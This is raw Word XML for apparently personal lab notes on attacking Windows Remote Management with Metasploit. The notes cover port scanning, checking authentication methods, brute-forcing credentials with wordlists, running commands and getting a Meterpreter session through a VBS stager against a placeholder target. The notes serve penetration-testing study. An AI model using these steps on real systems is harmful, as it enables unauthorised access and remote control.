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87F9" w14:textId="7C0B61EB" w:rsidR="00853ABF" w:rsidRPr="00916F76" w:rsidRDefault="00916F76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00916F76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00916F76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00916F76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows Remote Management Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00916F76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F563D" w14:textId="77777777" w:rsidR="00916F76" w:rsidRDefault="00916F76"/>
    <w:p w14:paraId="74C7F89C" w14:textId="54E7B241" w:rsidR="00916F76" w:rsidRDefault="00916F76">
      <w:r>
        <w:t>Facilitates remote access with windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52683871" w14:textId="50502DEE" w:rsidR="00916F76" w:rsidRDefault="004A5F46">
      <w:r>
        <w:t>Remotely execute the commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2374FD07" w14:textId="77777777" w:rsidR="00916F76" w:rsidRDefault="00916F76"/>
    <w:p w14:paraId="7E8FAE68" w14:textId="77EF892B" w:rsidR="002A1FFF" w:rsidRDefault="002A1FFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B6E3434" wp14:editId="0B09D415">
            <wp:extent cx="5112000" cy="1115522"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="209802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20333" name="Picture 20980203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959" cy="11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087A" w14:textId="77777777" w:rsidR="002A1FFF" w:rsidRDefault="002A1FFF"/>
    <w:p w14:paraId="68D5542B" w14:textId="243882E4" w:rsidR="002A1FFF" w:rsidRDefault="00DF746A">
      <w:r>
        <w:t>5985 (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ECA1F4" w14:textId="4DFAE2BC" w:rsidR="00DF746A" w:rsidRDefault="00DF746A" w:rsidP="00DF746A">
      <w:r>
        <w:t xml:space="preserve">5986 </w:t>
      </w:r>
      <w:r>
        <w:t>(HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305717BC" w14:textId="160DEB14" w:rsidR="00DF746A" w:rsidRDefault="00DF746A"/>
    <w:p w14:paraId="0F7E9C7D" w14:textId="508CD6D2" w:rsidR="00BB268D" w:rsidRPr="00BB268D" w:rsidRDefault="00BB268D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB268D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6EB72" w14:textId="6FF83D58" w:rsidR="00BB268D" w:rsidRPr="00130AC9" w:rsidRDefault="00130AC9">
      <w:r w:rsidRPr="00130AC9">
        <w:t xml:space="preserve">Use various forms of </w:t>
      </w:r>
      <w:r w:rsidR="00BB268D" w:rsidRPr="00130AC9">
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00130AC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD96054" w14:textId="77777777" w:rsidR="00130AC9" w:rsidRDefault="00130AC9" w:rsidP="00130AC9">
      <w:r>
        <w:t>Username, Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EAE9FF" w14:textId="3B0D5CA7" w:rsidR="00130AC9" w:rsidRDefault="00130AC9">
      <w:r>
        <w:t>Etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733EA368" w14:textId="77777777" w:rsidR="00130AC9" w:rsidRDefault="00130AC9"/>
    <w:p w14:paraId="637E2173" w14:textId="77777777" w:rsidR="00130AC9" w:rsidRDefault="00130AC9"/>
    <w:p w14:paraId="7DE75FA3" w14:textId="74222B28" w:rsidR="00BB268D" w:rsidRPr="00130AC9" w:rsidRDefault="00130AC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00130AC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F54C5" w14:textId="77777777" w:rsidR="00130AC9" w:rsidRDefault="00130AC9"/>
    <w:p w14:paraId="39076C7A" w14:textId="15924B6C" w:rsidR="00130AC9" w:rsidRDefault="003D35CB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231DC3EC" w14:textId="242035D7" w:rsidR="003D35CB" w:rsidRDefault="003D35CB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D1783" w14:textId="7FC7A985" w:rsidR="003D35CB" w:rsidRDefault="003D35CB">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E104EC0" w14:textId="6DD4AA65" w:rsidR="003D35CB" w:rsidRDefault="003D35CB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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-O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30C766CA" w14:textId="77777777" w:rsidR="003D35CB" w:rsidRDefault="003D35CB"/>
    <w:p w14:paraId="7CBB1AF0" w14:textId="07E2FB9F" w:rsidR="003D35CB" w:rsidRDefault="001E17BD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># by default it  scan 1000 common ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC34523" w14:textId="77777777" w:rsidR="0052758E" w:rsidRDefault="0052758E"/>
    <w:p w14:paraId="6C2D5C5D" w14:textId="20EFE224" w:rsidR="001E17BD" w:rsidRDefault="001E17BD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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-O </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6931E1B7" w14:textId="3FFD400D" w:rsidR="003C6FEF" w:rsidRDefault="003C6FEF"/>
    <w:p w14:paraId="6698C049" w14:textId="390E371C" w:rsidR="001E17BD" w:rsidRDefault="001E17BD">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE0451" w14:textId="6EA4884F" w:rsidR="003C6FEF" w:rsidRDefault="003C6FEF">
      <w:r>
        <w:t xml:space="preserve"># sometime it gives the service name which is totally different form </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35567C" w14:textId="77777777" w:rsidR="003C6FEF" w:rsidRDefault="003C6FEF"/>
    <w:p w14:paraId="0585EC8F" w14:textId="179755A2" w:rsidR="00D35819" w:rsidRPr="00A10CFB" w:rsidRDefault="00D35819">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">#check the authentication supported by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB62D33" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="21507F01" w14:textId="59BA5E08" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type:auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name:winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05B4C641" w14:textId="0FAF051A" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm_auth_methods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FCBEE" w14:textId="7306AEE1" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve"># tell us whether the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is enabled and also auth method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9DAAD" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="777B1E5C" w14:textId="4D4692F7" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AACD6B" w14:textId="3E62AB6A" w:rsidR="00D35819" w:rsidRDefault="00D35819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21941239" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="15D36817" w14:textId="6A4CEDC1" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>open the browser to check the URI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44762039" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="73525538" w14:textId="61A13140" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00380ABA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target_ip/5985</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76E439BA" w14:textId="2CE221BF" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t># it show 404  so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46557312" w14:textId="54CB54F5" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00380ABA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target_ip/5985</w:t>
        </w:r>
        <w:r w:rsidRPr="00380ABA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/wsman</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F7E3B78" w14:textId="1BAAA536" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t xml:space="preserve">#it’s default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D84DD36" w14:textId="6F5B2E82" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t>#it show nothing , that  normal ,that fine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56328351" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819"/>
    <w:p w14:paraId="5D862CF8" w14:textId="7DD082B0" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC2629" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819"/>
    <w:p w14:paraId="0F79A3B8" w14:textId="619CACD0" w:rsidR="00D35819" w:rsidRPr="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#perform brute-force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05507FD9" w14:textId="63F3A3B7" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7AAE03" w14:textId="1DA5C77B" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t>Use(index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579DB1D9" w14:textId="4140F8F6" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15891709" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819"/>
    <w:p w14:paraId="44BFD43F" w14:textId="72C27066" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t>Set USER_FILE /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metsaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-framework/data/wordlists/common_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0610BA" w14:textId="1B8EE336" w:rsidR="00D35819" w:rsidRDefault="00D35819" w:rsidP="00D35819">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r>
        <w:t>PASS</w:t>
      </w:r>
      <w:r>
        <w:t>_FILE /usr/share/metsaploit-framework/data/wordlists/</w:t>
      </w:r>
      <w:r>
        <w:t>unix_passwords</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6192F" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="17A87DC6" w14:textId="73F2B691" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02801CE8" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="1EAAAFD7" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="7F5B1882" w14:textId="2DDD40D3" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve"># user name and password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>finded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D6728CB" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="3F0F891A" w14:textId="5D118F2D" w:rsidR="00D35819" w:rsidRPr="00D35819" w:rsidRDefault="00D35819">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># run command on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E456A9" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="21CDCA15" w14:textId="59473179" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40261AC9" w14:textId="3BB57E5F" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59064E06" w14:textId="2A76EDD9" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C090904" w14:textId="7309A9C6" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Set USERNAME administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCB38D" w14:textId="1B4E5363" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve">Set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tinkerbell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ED84715" w14:textId="75321CAC" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve">Set CMD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D18C48E" w14:textId="36892AED" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC85E81" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="15CE85A8" w14:textId="246D1F55" w:rsidR="00D35819" w:rsidRPr="00D35819" w:rsidRDefault="00D35819">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">To obtain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D35819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08375151" w14:textId="77777777" w:rsidR="00D35819" w:rsidRDefault="00D35819"/>
    <w:p w14:paraId="5ACA96E2" w14:textId="7D0EA716" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrm_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74D4F930" w14:textId="3920D2F1" w:rsidR="00D35819" w:rsidRDefault="00D35819">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use(index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02590248" w14:textId="32515DF2" w:rsidR="00D35819" w:rsidRDefault="003A08CC">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF70A7E" w14:textId="635DA7E7" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B4883BB" w14:textId="77777777" w:rsidR="003A08CC" w:rsidRDefault="003A08CC" w:rsidP="003A08CC">
      <w:r>
        <w:t>Set USERNAME administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D97699" w14:textId="15B6321C" w:rsidR="003A08CC" w:rsidRDefault="003A08CC" w:rsidP="003A08CC">
      <w:r>
        <w:t xml:space="preserve">Set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tinkerbel</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="537CB417" w14:textId="21CAC37A" w:rsidR="003A08CC" w:rsidRDefault="003A08CC" w:rsidP="003A08CC">
      <w:r>
        <w:t>Set FORCE_VBS true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46098B95" w14:textId="16C684C3" w:rsidR="003A08CC" w:rsidRDefault="003A08CC" w:rsidP="003A08CC">
      <w:r>
        <w:t>#it must be true to run it comfortably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6EC0E0" w14:textId="03A9C0BA" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BAFC8" w14:textId="35FF2B47" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:r>
        <w:t># if error comes check the set value or any more to set .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E6295" w14:textId="77777777" w:rsidR="003A08CC" w:rsidRDefault="003A08CC"/>
    <w:p w14:paraId="2D670DCF" w14:textId="74652695" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:r>
        <w:t xml:space="preserve"># get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07D1A2" w14:textId="77777777" w:rsidR="003A08CC" w:rsidRDefault="003A08CC"/>
    <w:p w14:paraId="207561E7" w14:textId="40598619" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36FDA8E7" w14:textId="5EE306DC" w:rsidR="003A08CC" w:rsidRDefault="003A08CC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="605CCCA9" w14:textId="77777777" w:rsidR="003A08CC" w:rsidRDefault="003A08CC"/>
    <w:p w14:paraId="2D865DEF" w14:textId="77777777" w:rsidR="00587813" w:rsidRDefault="00587813"/>
    <w:p w14:paraId="7CC3266A" w14:textId="7CB6A214" w:rsidR="00587813" w:rsidRPr="0052758E" w:rsidRDefault="00587813">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052758E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92DEF6" w14:textId="44371440" w:rsidR="00587813" w:rsidRDefault="00445827" w:rsidP="00587813">
      <w:r w:rsidRPr="00445827">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter session’s architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:t xml:space="preserve"> (32-bit or 64-bit) depends on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target process it runs inside</w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:t xml:space="preserve"> is usually a </w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64-bit, high-privilege system process</w:t>
      </w:r>
      <w:r w:rsidRPr="00445827">
        <w:t xml:space="preserve"> on 64-bit Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79DA52" w14:textId="5BFC2724" w:rsidR="00587813" w:rsidRDefault="005D6413">
      <w:r w:rsidRPr="005D6413">
        <w:t xml:space="preserve">FORCE_VBS — when set to true in a Metasploit module, forces the module to use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VBScript-based payload/launcher</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6413">
        <w:t xml:space="preserve"> (a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6413">
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6413">
        <w:t xml:space="preserve"> stager) instead of its default binary/executable stager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CE27A" w14:textId="781B39C6" w:rsidR="005D6413" w:rsidRPr="005D6413" w:rsidRDefault="005D6413" w:rsidP="005D6413">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6413">
        <w:t>Use it when you need a script dropper because EXE execution is blocked or filtered, or when you want to run something via Windows Script Host (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6413">
        <w:t>wscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6413">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6413">
        <w:t>cscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6413">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C0CDB5" w14:textId="46267DC6" w:rsidR="003A08CC" w:rsidRDefault="003A08CC" w:rsidP="005D6413"/>
    <w:sectPr w:rsidR="003A0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2CE6C" w14:textId="77777777" w:rsidR="002E5D6B" w:rsidRDefault="002E5D6B" w:rsidP="00D35819">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AAC0EFF" w14:textId="77777777" w:rsidR="002E5D6B" w:rsidRDefault="002E5D6B" w:rsidP="00D35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1C01" w14:textId="77777777" w:rsidR="002E5D6B" w:rsidRDefault="002E5D6B" w:rsidP="00D35819">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34119DAE" w14:textId="77777777" w:rsidR="002E5D6B" w:rsidRDefault="002E5D6B" w:rsidP="00D358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44FE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
